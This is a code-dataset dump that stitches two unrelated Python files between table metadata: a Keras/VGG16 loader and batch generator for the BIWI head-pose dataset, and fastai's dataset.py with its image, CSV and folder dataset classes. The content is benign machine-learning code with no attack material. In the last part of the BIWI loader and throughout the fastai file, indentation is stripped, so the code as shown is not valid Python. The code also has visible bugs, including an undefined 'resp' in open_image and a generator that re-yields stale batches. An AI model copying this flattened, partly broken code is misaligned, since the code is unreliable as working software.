] | null | null | null | # Author: Muratcan Cicek, https://users.soe.ucsc.edu/~cicekm/
import os
# On the author's Windows box ("MSI3") Keras must use the Theano backend.
if 'COMPUTERNAME' in os.environ:
    if os.environ['COMPUTERNAME'] == "MSI3":
        os.environ['KERAS_BACKEND'] = 'theano'
        os.environ['MKL_THREADING_LAYER'] = 'GNU'
# Dirty importing that allows the main author to switch environments easily
# (package-relative imports when loaded as part of DatasetHandler, plain
# imports when run as a standalone script).
if '.' in __name__:
    from DatasetHandler.NeighborFolderimporter import *
    from DatasetHandler.BiwiTarBrowser import *
else:
    from NeighborFolderimporter import *
    from BiwiTarBrowser import *
from keras.applications import vgg16
from sklearn.preprocessing import MinMaxScaler, scale
from keras.preprocessing import image
from matplotlib import pyplot
from os import listdir
import itertools
import datetime
import tarfile
import struct
import random
import numpy
import png
import cv2
import os
# Fixed seed so shuffling throughout this module is reproducible.
random.seed(7)
importNeighborFolders()
# 'paths' presumably supplies machine-specific locations such as
# BIWI_Main_Folder (used below) — TODO confirm.
from paths import *
#################### Constants ####################
pwd = os.path.abspath(os.path.dirname(__file__))
BIWI_Data_folder = BIWI_Main_Folder + 'hpdb/'
# NOTE(review): .replace() below only rewrites the literal suffix (operator
# precedence), so 'pwd' keeps native separators while the suffix is
# converted — works, but fragile.
BIWI_SnippedData_folder = pwd + '/BIWI_Files/BIWI_Samples/hpdb/'.replace('/', os.path.sep)
BIWI_Lebels_file = BIWI_Main_Folder + 'db_annotations.tgz'
BIWI_Lebels_file_Local = pwd + '/BIWI_Files/db_annotations.tgz'.replace('/', os.path.sep)
# Raw BIWI RGB frames are 480x640x3.
BIWI_Frame_Shape = (480, 640, 3)
# Intermediate resize used before center-cropping to 224x224 (see pngObjToNpArr).
Target_Frame_Shape_VGG16 = (240, 320, 3)
def now():
    """Return the current local timestamp as a human-readable string."""
    return str(datetime.datetime.now())
# Labels are divided by this factor before training (see scaleY).
label_rescaling_factor = 100
# Index 0 is a placeholder so that subject ids 1..24 map directly to entries.
BIWI_Subject_IDs = ['XX', 'F01', 'F02', 'F03', 'F04', 'F05', 'F06', 'M01', 'M02', 'M03', 'M04', 'M05', 'M06', 'M07', 'M08', 'F03', 'M09', 'M10', 'F05', 'M11', 'M12', 'F02', 'M01', 'M13', 'M14']
# Annotation scalers built once from the label archive; getAnnoScalers is
# pulled in via a wildcard import — presumably from BiwiTarBrowser.
BIWI_Lebel_Scalers = getAnnoScalers(tarFile = BIWI_Lebels_file)
#################### Frame Reading ####################
def getRGBpngFileName(subject, frame):
    """Build the relative path of an RGB frame, e.g. ``01/frame_00042_rgb.png``."""
    subj = str(subject).zfill(2)
    idx = str(frame).zfill(5)
    return subj + '/frame_' + idx + '_rgb.png'
def pngObjToNpArr(imagePath):
    """Load an RGB png and preprocess it for VGG16.

    The image is resized to 240x320, center-cropped to 224x224 and run
    through Keras' VGG16 preprocessing.
    """
    img = image.load_img(imagePath, target_size = Target_Frame_Shape_VGG16)
    x = image.img_to_array(img)
    # 240 - 2*8 = 224 rows, 320 - 2*48 = 224 cols: center crop to VGG16 input.
    x = x[8:-8, 48:-48, :]#[14:-15, 74:-75, :]
    return vgg16.preprocess_input(x)
def getBIWIFrameAsNpArr(subject, frame, dataFolder = BIWI_Data_folder, preprocess_input = None):
    """Read one BIWI frame as an array, using the given (or default) preprocessor."""
    imagePath = dataFolder + getRGBpngFileName(subject, frame)
    loader = pngObjToNpArr if preprocess_input is None else preprocess_input
    return loader(imagePath)
def filterFrameNamesForSubj(subject, dataFolder):
    """Return a lazy iterator of (frameKey, absolutePath) pairs, sorted by name.

    Frame keys look like ``'01/frame_00001'``; only ``*_rgb.png`` files count.
    """
    prefix = str(subject).zfill(2)
    subjectFolder = prefix + os.path.sep
    # Directory listing and sorting happen eagerly; the pair construction is lazy.
    rgbNames = sorted(fn for fn in os.listdir(dataFolder + subjectFolder)
                      if '_rgb.png' in fn)
    return ((prefix + '/' + fn[:-8], dataFolder + subjectFolder + fn)
            for fn in rgbNames)
def getAllFramesForSubj(subject, dataFolder = BIWI_Data_folder, preprocess_input = None):
    """Lazily read every RGB frame of a subject as (frameKey, array) pairs."""
    names = filterFrameNamesForSubj(subject, dataFolder)
    loader = pngObjToNpArr if preprocess_input is None else preprocess_input
    # Decoding only happens on iteration, keeping memory usage low.
    return ((key, loader(framePath)) for key, framePath in names)
def getSubjectsListFromFolder(dataFolder):
    """Return the sorted list of subject ids found in ``dataFolder``."""
    # Only the first two characters of each entry identify the subject.
    prefixes = {n[:2] for n in os.listdir(dataFolder)}
    subjects = []
    for prefix in prefixes:
        try:
            subjects.append(int(prefix[-2:]))
        except ValueError:
            # Skip entries whose leading characters are not a number.
            continue
    return sorted(subjects)
def readBIWI_Frames(dataFolder = BIWI_Data_folder, subjectList = None, preprocess_input = None):
    """Map subject id -> lazy frame generator for each requested subject."""
    if subjectList is None:
        subjectList = getSubjectsListFromFolder(dataFolder)
    return {subj: getAllFramesForSubj(subj, dataFolder, preprocess_input = preprocess_input)
            for subj in subjectList}
def showSampleFrames(count = 10, preprocess_input = None):
    """Display the first ``count`` frames of every subject in the local sample set."""
    biwiFrames = readBIWI_Frames(dataFolder = BIWI_SnippedData_folder, preprocess_input = preprocess_input)
    for subj, frames in biwiFrames.items():
        # Materialize the lazy generator and sort by frame key.
        frames = [(n, f) for n, f in sorted(frames, key=lambda x: x[0])]
        for name, frame in frames[:count]:
            print(frame.shape)
            # rollaxis moves axis 0 to the end, i.e. assumes channels-first
            # data; NOTE(review): pngObjToNpArr returns channels-last arrays,
            # so confirm which preprocessor is in use before trusting this.
            pyplot.imshow(numpy.rollaxis(frame, 0, 3))
            pyplot.title(name)
            pyplot.show()
#################### Merging ####################
def scaleX(arr):
    """Return the input features unchanged (input scaling is a no-op).

    Bug fix: the original body returned the undefined name ``new_arr`` and
    raised NameError whenever called; since no input scaling is implemented,
    return the array as-is.
    """
    return arr
def scaleY(arr):
    """Rescale label values by the module-wide ``label_rescaling_factor``."""
    return arr / label_rescaling_factor
def rolling_window(m, timesteps):
    """Return overlapping windows of length ``timesteps`` along axis 0 of ``m``.

    Implemented as a zero-copy stride trick; treat the result as read-only.
    """
    win_shape = (m.shape[0] - timesteps + 1, timesteps) + m.shape[1:]
    win_strides = (m.strides[0],) + m.strides
    return numpy.lib.stride_tricks.as_strided(m, shape=win_shape, strides=win_strides)
def reshaper(m, l, timesteps, overlapping):
    """Group frames ``m`` and labels ``l`` into sequences of ``timesteps``.

    With ``overlapping`` a sliding window is used and labels are aligned to
    the last frame of each window; otherwise leading leftovers are dropped,
    the data is cut into disjoint sequences, and each sequence keeps only
    its final label.
    """
    if overlapping:
        return rolling_window(m, timesteps), l[timesteps-1:]
    # Drop the first frames so the remainder divides evenly into sequences.
    wasted = m.shape[0] % timesteps
    m, l = m[wasted:], l[wasted:]
    seq_count = int(m.shape[0] / timesteps)
    m = m.reshape((seq_count, timesteps, m.shape[1], m.shape[2], m.shape[3]))
    l = l.reshape((seq_count, timesteps, l.shape[1]))[:, -1, :]
    return m, l
def labelFramesForSubj(frames, annos, timesteps = None, overlapping = False, scaling = True, scalers = None):
    """Align frames with annotations for one subject and stack them.

    ``frames`` is an iterable of (frameKey, array) pairs and ``annos`` a dict
    keyed by the same frame keys; only keys present in both are used.
    Returns (inputMatrix, labels), optionally scaled and grouped into
    ``timesteps``-long sequences via reshaper().
    """
    frames = {n: f for n, f in frames}
    # Set intersection of frame keys and annotation keys, in sorted order.
    keys = sorted(frames & annos.keys())
    # NOTE(review): itemgetter returns a bare value (not a tuple) when there
    # is exactly one key, which would break numpy.stack below.
    inputMatrix = numpy.stack(itemgetter(*keys)(frames))
    labels = numpy.stack(itemgetter(*keys)(annos))
    if scaling: # scaleX()
        #inputMatrix, labels = inputMatrix, scaleY(labels)
        if scalers != None: labels = scaleAnnoByScalers(labels, scalers)
    if timesteps != None:
        inputMatrix, labels = reshaper(inputMatrix, labels, timesteps, overlapping)
    return inputMatrix, labels
def readBIWIDataset(dataFolder = BIWI_Data_folder, labelsTarFile = BIWI_Lebels_file, subjectList = None, timesteps = None, overlapping = False, scaling = True, preprocess_input = None, printing = True):
    """Lazily yield one (inputMatrix, labels) pair per subject of the dataset."""
    # Subjects default to the full BIWI range 1..24.
    if subjectList == None: subjectList = [s for s in range(1, 25)]
    biwiFrames = readBIWI_Frames(dataFolder = dataFolder, subjectList = subjectList, preprocess_input = preprocess_input)
    biwiAnnos = readBIWI_Annos(tarFile = labelsTarFile, subjectList = subjectList)
    # Module-wide scalers keep label scaling consistent across subjects.
    scalers = BIWI_Lebel_Scalers #getAnnoScalers(biwiAnnos, tarFile = labelsTarFile, subjectList = subjectList)
    labeledFrames = lambda frames, labels: labelFramesForSubj(frames, labels, timesteps, overlapping, scaling, scalers)
    biwi = (labeledFrames(frames, biwiAnnos[subj]) for subj, frames in biwiFrames.items())
    # NOTE(review): this message prints before the generator is consumed;
    # frames are actually read lazily, on iteration.
    if printing: print('All frames and annotations from ' + str(len(subjectList)) + ' datasets have been read by ' + now())
    return biwi
#################### GeneratorForBIWIDataset ####################
def generatorForBIWIDataset(dataFolder = BIWI_Data_folder, labelsTarFile = BIWI_Lebels_file, subjectList = None, timesteps = None, overlapping = False, scaling = True, preprocess_input = None, shuffle = True):
    """Return (samples_per_epoch, generator) over single (frame, label) pairs.

    All subjects are loaded eagerly here (to count the samples); the returned
    generator then replays the per-subject-shuffled pairs in order.
    """
    samples_per_epoch = 0
    # Shuffling mutates the caller's subjectList in place.
    if shuffle and subjectList != None: random.shuffle(subjectList)
    biwi = readBIWIDataset(dataFolder, labelsTarFile, subjectList, timesteps, overlapping, scaling, preprocess_input, printing = False)
    gen = itertools.chain()
    for inputMatrix, labels in biwi:
        samples_per_epoch += len(inputMatrix)
        # Pair frames with labels and shuffle within the subject.
        z = list(zip(inputMatrix, labels))
        if shuffle: random.shuffle(z)
        data = ((frame, label) for frame, label in z)
        gen = itertools.chain(gen, data)
    return samples_per_epoch, gen
def genBIWIDataset(dataFolder = BIWI_Data_folder, labelsTarFile = BIWI_Lebels_file, subjectList = None, timesteps = None, overlapping = False, scaling = True, preprocess_input = None, shuffle = True):
    """Like generatorForBIWIDataset, but with separate frame/label generators.

    Returns (samples_per_epoch, frame_generator, label_generator). Both
    generators iterate the same shuffled per-subject lists, so consuming
    them in lockstep keeps frames aligned with their labels.
    """
    samples_per_epoch = 0
    # Shuffling mutates the caller's subjectList in place.
    if shuffle and subjectList != None: random.shuffle(subjectList)
    biwi = readBIWIDataset(dataFolder, labelsTarFile, subjectList, timesteps, overlapping, scaling, preprocess_input, printing = False)
    fr = itertools.chain()
    lbl = itertools.chain()
    for inputMatrix, labels in biwi:
        samples_per_epoch += len(inputMatrix)
        z = list(zip(inputMatrix, labels))
        if shuffle: random.shuffle(z)
        f = (frame for frame, label in z)
        l = (label for frame, label in z)
        fr = itertools.chain(fr, f)
        lbl = itertools.chain(lbl, l)
    return samples_per_epoch, fr, lbl
def batchGeneratorForBIWIDataset(batch_size, output_begin, num_outputs, dataFolder = BIWI_Data_folder, labelsTarFile = BIWI_Lebels_file, subjectList = None, timesteps = None, overlapping = False, scaling = True, preprocess_input = None, shuffle = True):
    """Endless Keras-style batch generator over the whole BIWI dataset.

    Slices ``num_outputs`` label columns starting at ``output_begin``; batch
    arrays are fixed at the 224x224x3 VGG16 input shape.
    """
    samples_count = 0
    while True:
        # Re-create the underlying generator at the start of every epoch.
        if samples_count == 0:
            samples_per_epoch, gen = generatorForBIWIDataset(dataFolder, labelsTarFile, subjectList, timesteps, overlapping, scaling, preprocess_input, shuffle)
        c = 0
        frames_batch, labels_batch = numpy.zeros((batch_size, 224, 224, 3)), numpy.zeros((batch_size, num_outputs))
        for frame, label in gen:
            if c < batch_size:
                frames_batch[c], labels_batch[c] = frame, label[output_begin:output_begin+num_outputs]
                c += 1
            else:
                # NOTE(review): neither ``c`` nor the buffers are reset after
                # a yield, so once the first batch fills every further sample
                # re-yields the same (stale) batch — looks like a bug.
                samples_count += batch_size
                if samples_count == samples_per_epoch:
                    samples_count = 0
                yield frames_batch, labels_batch
def getGeneratorsForBIWIDataset(epochs, dataFolder = BIWI_Data_folder, labelsTarFile = BIWI_Lebels_file, subjectList = None, timesteps = None, overlapping = False, scaling = True, preprocess_input = None, shuffle = True):
    """Return (samples_per_epoch, lazy sequence of per-epoch generators).

    ``epochs + 1`` generators are produced because the first one is consumed
    here only to obtain the sample count.
    """
    def generate(): return generatorForBIWIDataset(dataFolder, labelsTarFile, subjectList, timesteps, overlapping, scaling, preprocess_input, shuffle)
    biwiGenerators = (generate() for e in range(epochs+1))
    samples_per_epoch, gen = next(biwiGenerators)
    return samples_per_epoch, biwiGenerators
def batchGeneratorFromBIWIGenerators(gens, batch_size, output_begin, num_outputs):
for samples_per_epoch, g in gens:
c = 0
frames_batch, labels_batch = numpy.zeros((batch_size, 224, 224, 3)), numpy.zeros((batch_size, num_outputs))
for frame, label in g:
if c < batch_size:
frames_batch[c], labels_batch[c] = frame, label[output_begin:output_begin+num_outputs]
c += 1
else:
yield frames_batch, labels_batch
def countGeneratorForBIWIDataset():
gen = generatorForBIWIDataset()
c, f, l = 0, 0, 0
for frame, label in gen:
c, f, l = c+1, frame.shape, label.shape
print(c, f, l) # 15677 (224, 224, 3) (6,)
def printSamplesFromBIWIDataset(dataFolder = BIWI_Data_folder, labelsTarFile = BIWI_Lebels_file, subjectList = None, preprocess_input = None):
biwi = readBIWIDataset(dataFolder, labelsTarFile, subjectList = subjectList, timesteps = 10, overlapping = True, preprocess_input = preprocess_input)
for subj, (inputMatrix, labels) in enumerate(biwi):
print(subj+1, inputMatrix.shape, labels.shape)
#################### Testing ####################
def main():
showSampleFrames(1)
#printSampleAnnos(count = -1)
#printSampleAnnosForSubj(1, count = -1)
#printSamplesFromBIWIDataset(subjectList = [1])
# readBIWIDataset(dataFolder = BIWI_SnippedData_file, labelsTarFile = BIWI_Lebels_file_Local)
# countGeneratorForBIWIDataset()
if __name__ == "__main__":
main()
print('Done') | 48.139344 | 253 | 0.685595 |
8113a8cba2bcf2286cd0500e071beb5cb68e6eef | 20,221 | py | Python | fastai/dataset.py | DeepBodapati/fastai | 3cfa9361ee1daadeb8a9df540c2da550f77a2dc2 | [
"Apache-2.0"
] | null | null | null | fastai/dataset.py | DeepBodapati/fastai | 3cfa9361ee1daadeb8a9df540c2da550f77a2dc2 | [
"Apache-2.0"
] | null | null | null | fastai/dataset.py | DeepBodapati/fastai | 3cfa9361ee1daadeb8a9df540c2da550f77a2dc2 | [
"Apache-2.0"
] | null | null | null | import csv
from .imports import *
from .torch_imports import *
from .core import *
from .transforms import *
from .layer_optimizer import *
from .dataloader import DataLoader
def get_cv_idxs(n, cv_idx=0, val_pct=0.2, seed=42):
""" Get a list of index values for Validation set from a dataset
Arguments:
n : int, Total number of elements in the data set.
cv_idx : int, starting index [idx_start = cv_idx*int(val_pct*n)]
val_pct : (int, float), validation set percentage
seed : seed value for RandomState
Returns:
list of indexes
"""
np.random.seed(seed)
n_val = int(val_pct*n)
idx_start = cv_idx*n_val
idxs = np.random.permutation(n)
return idxs[idx_start:idx_start+n_val]
def resize_img(fname, targ, path, new_path):
"""
Enlarge or shrink a single image to scale, such that the smaller of the height or width dimension is equal to targ.
"""
dest = os.path.join(path,new_path,str(targ),fname)
if os.path.exists(dest): return
im = Image.open(os.path.join(path, fname)).convert('RGB')
r,c = im.size
ratio = targ/min(r,c)
sz = (scale_to(r, ratio, targ), scale_to(c, ratio, targ))
os.makedirs(os.path.split(dest)[0], exist_ok=True)
im.resize(sz, Image.LINEAR).save(dest)
def resize_imgs(fnames, targ, path, new_path):
"""
Enlarge or shrink a set of images in the same directory to scale, such that the smaller of the height or width dimension is equal to targ.
Note:
-- This function is multithreaded for efficiency.
-- When destination file or folder already exist, function exists without raising an error.
"""
if not os.path.exists(os.path.join(path,new_path,str(targ),fnames[0])):
with ThreadPoolExecutor(8) as e:
ims = e.map(lambda x: resize_img(x, targ, path, new_path), fnames)
for x in tqdm(ims, total=len(fnames), leave=False): pass
return os.path.join(path,new_path,str(targ))
def read_dir(path, folder):
""" Returns a list of relative file paths to `path` for all files within `folder` """
full_path = os.path.join(path, folder)
fnames = glob(f"{full_path}/*.*")
directories = glob(f"{full_path}/*/")
if any(fnames):
return [os.path.relpath(f,path) for f in fnames]
elif any(directories):
raise FileNotFoundError("{} has subdirectories but contains no files. Is your directory structure is correct?".format(full_path))
else:
raise FileNotFoundError("{} folder doesn't exist or is empty".format(full_path))
def read_dirs(path, folder):
'''
Fetches name of all files in path in long form, and labels associated by extrapolation of directory names.
'''
lbls, fnames, all_lbls = [], [], []
full_path = os.path.join(path, folder)
for lbl in sorted(os.listdir(full_path)):
if lbl not in ('.ipynb_checkpoints','.DS_Store'):
all_lbls.append(lbl)
for fname in os.listdir(os.path.join(full_path, lbl)):
if fname not in ('.DS_Store'):
fnames.append(os.path.join(folder, lbl, fname))
lbls.append(lbl)
return fnames, lbls, all_lbls
def n_hot(ids, c):
'''
one hot encoding by index. Returns array of length c, where all entries are 0, except for the indecies in ids
'''
res = np.zeros((c,), dtype=np.float32)
res[ids] = 1
return res
def folder_source(path, folder):
"""
Returns the filenames and labels for a folder within a path
Returns:
-------
fnames: a list of the filenames within `folder`
all_lbls: a list of all of the labels in `folder`, where the # of labels is determined by the # of directories within `folder`
lbl_arr: a numpy array of the label indices in `all_lbls`
"""
fnames, lbls, all_lbls = read_dirs(path, folder)
lbl2idx = {lbl:idx for idx,lbl in enumerate(all_lbls)}
idxs = [lbl2idx[lbl] for lbl in lbls]
lbl_arr = np.array(idxs, dtype=int)
return fnames, lbl_arr, all_lbls
def parse_csv_labels(fn, skip_header=True, cat_separator = ' '):
"""Parse filenames and label sets from a CSV file.
This method expects that the csv file at path :fn: has two columns. If it
has a header, :skip_header: should be set to True. The labels in the
label set are expected to be space separated.
Arguments:
fn: Path to a CSV file.
skip_header: A boolean flag indicating whether to skip the header.
Returns:
a two-tuple of (
image filenames,
a dictionary of filenames and corresponding labels
)
.
:param cat_separator: the separator for the categories column
"""
df = pd.read_csv(fn, index_col=0, header=0 if skip_header else None, dtype=str)
fnames = df.index.values
df.iloc[:,0] = df.iloc[:,0].str.split(cat_separator)
return fnames, list(df.to_dict().values())[0]
def nhot_labels(label2idx, csv_labels, fnames, c):
all_idx = {k: n_hot([label2idx[o] for o in v], c)
for k,v in csv_labels.items()}
return np.stack([all_idx[o] for o in fnames])
def csv_source(folder, csv_file, skip_header=True, suffix='', continuous=False):
fnames,csv_labels = parse_csv_labels(csv_file, skip_header)
return dict_source(folder, fnames, csv_labels, suffix, continuous)
def dict_source(folder, fnames, csv_labels, suffix='', continuous=False):
all_labels = sorted(list(set(p for o in csv_labels.values() for p in o)))
full_names = [os.path.join(folder,str(fn)+suffix) for fn in fnames]
if continuous:
label_arr = np.array([np.array(csv_labels[i]).astype(np.float32)
for i in fnames])
else:
label2idx = {v:k for k,v in enumerate(all_labels)}
label_arr = nhot_labels(label2idx, csv_labels, fnames, len(all_labels))
is_single = np.all(label_arr.sum(axis=1)==1)
if is_single: label_arr = np.argmax(label_arr, axis=1)
return full_names, label_arr, all_labels
class BaseDataset(Dataset):
"""An abstract class representing a fastai dataset. Extends torch.utils.data.Dataset."""
def __init__(self, transform=None):
self.transform = transform
self.n = self.get_n()
self.c = self.get_c()
self.sz = self.get_sz()
def get1item(self, idx):
x,y = self.get_x(idx),self.get_y(idx)
return self.get(self.transform, x, y)
def __getitem__(self, idx):
if isinstance(idx,slice):
xs,ys = zip(*[self.get1item(i) for i in range(*idx.indices(self.n))])
return np.stack(xs),ys
return self.get1item(idx)
def __len__(self): return self.n
def get(self, tfm, x, y):
return (x,y) if tfm is None else tfm(x,y)
@abstractmethod
def get_n(self):
"""Return number of elements in the dataset == len(self)."""
raise NotImplementedError
@abstractmethod
def get_c(self):
"""Return number of classes in a dataset."""
raise NotImplementedError
@abstractmethod
def get_sz(self):
"""Return maximum size of an image in a dataset."""
raise NotImplementedError
@abstractmethod
def get_x(self, i):
"""Return i-th example (image, wav, etc)."""
raise NotImplementedError
@abstractmethod
def get_y(self, i):
"""Return i-th label."""
raise NotImplementedError
@property
def is_multi(self):
"""Returns true if this data set contains multiple labels per sample."""
return False
@property
def is_reg(self):
"""True if the data set is used to train regression models."""
return False
def open_image(fn):
""" Opens an image using OpenCV given the file path.
Arguments:
fn: the file path of the image
Returns:
The image in RGB format as numpy array of floats normalized to range between 0.0 - 1.0
"""
flags = cv2.IMREAD_UNCHANGED+cv2.IMREAD_ANYDEPTH+cv2.IMREAD_ANYCOLOR
if not os.path.exists(fn):
raise OSError('No such file or directory: {}'.format(fn))
elif os.path.isdir(fn):
raise OSError('Is a directory: {}'.format(fn))
else:
#res = np.array(Image.open(fn), dtype=np.float32)/255
#if len(res.shape)==2: res = np.repeat(res[...,None],3,2)
#return res
try:
if str(fn).startswith("http"):
req = urllib.urlopen(str(fn))
image = np.asarray(bytearray(resp.read()), dtype="uint8")
im = cv2.imdecode(image, flags).astype(np.float32)/255
else:
im = cv2.imread(str(fn), flags).astype(np.float32)/255
if im is None: raise OSError(f'File not recognized by opencv: {fn}')
return cv2.cvtColor(im, cv2.COLOR_BGR2RGB)
except Exception as e:
raise OSError('Error handling image at: {}'.format(fn)) from e
class FilesDataset(BaseDataset):
def __init__(self, fnames, transform, path):
self.path,self.fnames = path,fnames
super().__init__(transform)
def get_sz(self): return self.transform.sz
def get_x(self, i): return open_image(os.path.join(self.path, self.fnames[i]))
def get_n(self): return len(self.fnames)
def resize_imgs(self, targ, new_path):
dest = resize_imgs(self.fnames, targ, self.path, new_path)
return self.__class__(self.fnames, self.y, self.transform, dest)
def denorm(self,arr):
"""Reverse the normalization done to a batch of images.
Arguments:
arr: of shape/size (N,3,sz,sz)
"""
if type(arr) is not np.ndarray: arr = to_np(arr)
if len(arr.shape)==3: arr = arr[None]
return self.transform.denorm(np.rollaxis(arr,1,4))
class FilesArrayDataset(FilesDataset):
def __init__(self, fnames, y, transform, path):
self.y=y
assert(len(fnames)==len(y))
super().__init__(fnames, transform, path)
def get_y(self, i): return self.y[i]
def get_c(self):
return self.y.shape[1] if len(self.y.shape)>1 else 0
class FilesIndexArrayDataset(FilesArrayDataset):
def get_c(self): return int(self.y.max())+1
class FilesNhotArrayDataset(FilesArrayDataset):
@property
def is_multi(self): return True
class FilesIndexArrayRegressionDataset(FilesArrayDataset):
def is_reg(self): return True
class ArraysDataset(BaseDataset):
def __init__(self, x, y, transform):
self.x,self.y=x,y
assert(len(x)==len(y))
super().__init__(transform)
def get_x(self, i): return self.x[i]
def get_y(self, i): return self.y[i]
def get_n(self): return len(self.y)
def get_sz(self): return self.x.shape[1]
class ArraysIndexDataset(ArraysDataset):
def get_c(self): return int(self.y.max())+1
def get_y(self, i): return self.y[i]
class ArraysNhotDataset(ArraysDataset):
def get_c(self): return self.y.shape[1]
@property
def is_multi(self): return True
class ModelData():
"""Encapsulates DataLoaders and Datasets for training, validation, test. Base class for fastai *Data classes."""
def __init__(self, path, trn_dl, val_dl, test_dl=None):
self.path,self.trn_dl,self.val_dl,self.test_dl = path,trn_dl,val_dl,test_dl
@classmethod
def from_dls(cls, path,trn_dl,val_dl,test_dl=None):
#trn_dl,val_dl = DataLoader(trn_dl),DataLoader(val_dl)
#if test_dl: test_dl = DataLoader(test_dl)
return cls(path, trn_dl, val_dl, test_dl)
@property
def is_reg(self): return self.trn_ds.is_reg
@property
def is_multi(self): return self.trn_ds.is_multi
@property
def trn_ds(self): return self.trn_dl.dataset
@property
def val_ds(self): return self.val_dl.dataset
@property
def test_ds(self): return self.test_dl.dataset
@property
def trn_y(self): return self.trn_ds.y
@property
def val_y(self): return self.val_ds.y
class ImageData(ModelData):
def __init__(self, path, datasets, bs, num_workers, classes):
trn_ds,val_ds,fix_ds,aug_ds,test_ds,test_aug_ds = datasets
self.path,self.bs,self.num_workers,self.classes = path,bs,num_workers,classes
self.trn_dl,self.val_dl,self.fix_dl,self.aug_dl,self.test_dl,self.test_aug_dl = [
self.get_dl(ds,shuf) for ds,shuf in [
(trn_ds,True),(val_ds,False),(fix_ds,False),(aug_ds,False),
(test_ds,False),(test_aug_ds,False)
]
]
def get_dl(self, ds, shuffle):
if ds is None: return None
return DataLoader(ds, batch_size=self.bs, shuffle=shuffle,
num_workers=self.num_workers, pin_memory=False)
@property
def sz(self): return self.trn_ds.sz
@property
def c(self): return self.trn_ds.c
def resized(self, dl, targ, new_path):
return dl.dataset.resize_imgs(targ,new_path) if dl else None
def resize(self, targ_sz, new_path='tmp'):
new_ds = []
dls = [self.trn_dl,self.val_dl,self.fix_dl,self.aug_dl]
if self.test_dl: dls += [self.test_dl, self.test_aug_dl]
else: dls += [None,None]
t = tqdm_notebook(dls)
for dl in t: new_ds.append(self.resized(dl, targ_sz, new_path))
t.close()
return self.__class__(new_ds[0].path, new_ds, self.bs, self.num_workers, self.classes)
@staticmethod
def get_ds(fn, trn, val, tfms, test=None, **kwargs):
res = [
fn(trn[0], trn[1], tfms[0], **kwargs), # train
fn(val[0], val[1], tfms[1], **kwargs), # val
fn(trn[0], trn[1], tfms[1], **kwargs), # fix
fn(val[0], val[1], tfms[0], **kwargs) # aug
]
if test is not None:
if isinstance(test, tuple):
test_lbls = test[1]
test = test[0]
else:
if len(trn[1].shape) == 1:
test_lbls = np.zeros((len(test),1))
else:
test_lbls = np.zeros((len(test),trn[1].shape[1]))
res += [
fn(test, test_lbls, tfms[1], **kwargs), # test
fn(test, test_lbls, tfms[0], **kwargs) # test_aug
]
else: res += [None,None]
return res
class ImageClassifierData(ImageData):
@classmethod
def from_arrays(cls, path, trn, val, bs=64, tfms=(None,None), classes=None, num_workers=4, test=None):
""" Read in images and their labels given as numpy arrays
Arguments:
path: a root path of the data (used for storing trained models, precomputed values, etc)
trn: a tuple of training data matrix and target label/classification array (e.g. `trn=(x,y)` where `x` has the
shape of `(5000, 784)` and `y` has the shape of `(5000,)`)
val: a tuple of validation data matrix and target label/classification array.
bs: batch size
tfms: transformations (for data augmentations). e.g. output of `tfms_from_model`
classes: a list of all labels/classifications
num_workers: a number of workers
test: a matrix of test data (the shape should match `trn[0]`)
Returns:
ImageClassifierData
"""
datasets = cls.get_ds(ArraysIndexDataset, trn, val, tfms, test=test)
return cls(path, datasets, bs, num_workers, classes=classes)
@classmethod
def from_paths(cls, path, bs=64, tfms=(None,None), trn_name='train', val_name='valid', test_name=None, test_with_labels=False, num_workers=8):
""" Read in images and their labels given as sub-folder names
Arguments:
path: a root path of the data (used for storing trained models, precomputed values, etc)
bs: batch size
tfms: transformations (for data augmentations). e.g. output of `tfms_from_model`
trn_name: a name of the folder that contains training images.
val_name: a name of the folder that contains validation images.
test_name: a name of the folder that contains test images.
num_workers: number of workers
Returns:
ImageClassifierData
"""
assert not(tfms[0] is None or tfms[1] is None), "please provide transformations for your train and validation sets"
trn,val = [folder_source(path, o) for o in (trn_name, val_name)]
if test_name:
test = folder_source(path, test_name) if test_with_labels else read_dir(path, test_name)
else: test = None
datasets = cls.get_ds(FilesIndexArrayDataset, trn, val, tfms, path=path, test=test)
return cls(path, datasets, bs, num_workers, classes=trn[2])
@classmethod
def from_csv(cls, path, folder, csv_fname, bs=64, tfms=(None,None),
val_idxs=None, suffix='', test_name=None, continuous=False, skip_header=True, num_workers=8):
""" Read in images and their labels given as a CSV file.
This method should be used when training image labels are given in an CSV file as opposed to
sub-directories with label names.
Arguments:
path: a root path of the data (used for storing trained models, precomputed values, etc)
folder: a name of the folder in which training images are contained.
csv_fname: a name of the CSV file which contains target labels.
bs: batch size
tfms: transformations (for data augmentations). e.g. output of `tfms_from_model`
val_idxs: index of images to be used for validation. e.g. output of `get_cv_idxs`.
If None, default arguments to get_cv_idxs are used.
suffix: suffix to add to image names in CSV file (sometimes CSV only contains the file name without file
extension e.g. '.jpg' - in which case, you can set suffix as '.jpg')
test_name: a name of the folder which contains test images.
continuous: TODO
skip_header: skip the first row of the CSV file.
num_workers: number of workers
Returns:
ImageClassifierData
"""
assert not (tfms[0] is None or tfms[1] is None), "please provide transformations for your train and validation sets"
assert not (os.path.isabs(folder)), "folder needs to be a relative path"
fnames,y,classes = csv_source(folder, csv_fname, skip_header, suffix, continuous=continuous)
return cls.from_names_and_array(path, fnames, y, classes, val_idxs, test_name,
num_workers=num_workers, suffix=suffix, tfms=tfms, bs=bs, continuous=continuous)
@classmethod
def from_names_and_array(cls, path, fnames,y,classes, val_idxs=None, test_name=None,
num_workers=8, suffix='', tfms=(None,None), bs=64, continuous=False):
val_idxs = get_cv_idxs(len(fnames)) if val_idxs is None else val_idxs
((val_fnames,trn_fnames),(val_y,trn_y)) = split_by_idx(val_idxs, np.array(fnames), y)
test_fnames = read_dir(path, test_name) if test_name else None
if continuous: f = FilesIndexArrayRegressionDataset
else:
f = FilesIndexArrayDataset if len(trn_y.shape)==1 else FilesNhotArrayDataset
datasets = cls.get_ds(f, (trn_fnames,trn_y), (val_fnames,val_y), tfms,
path=path, test=test_fnames)
return cls(path, datasets, bs, num_workers, classes=classes)
def split_by_idx(idxs, *a):
"""
Split each array passed as *a, to a pair of arrays like this (elements selected by idxs, the remaining elements)
This can be used to split multiple arrays containing training data to validation and training set.
:param idxs [int]: list of indexes selected
:param a list: list of np.array, each array should have same amount of elements in the first dimension
:return: list of tuples, each containing a split of corresponding array from *a.
First element of each tuple is an array composed from elements selected by idxs,
second element is an array of remaining elements.
"""
mask = np.zeros(len(a[0]),dtype=bool)
mask[np.array(idxs)] = True
return [(o[mask],o[~mask]) for o in a]
| 40.523046 | 146 | 0.642154 |
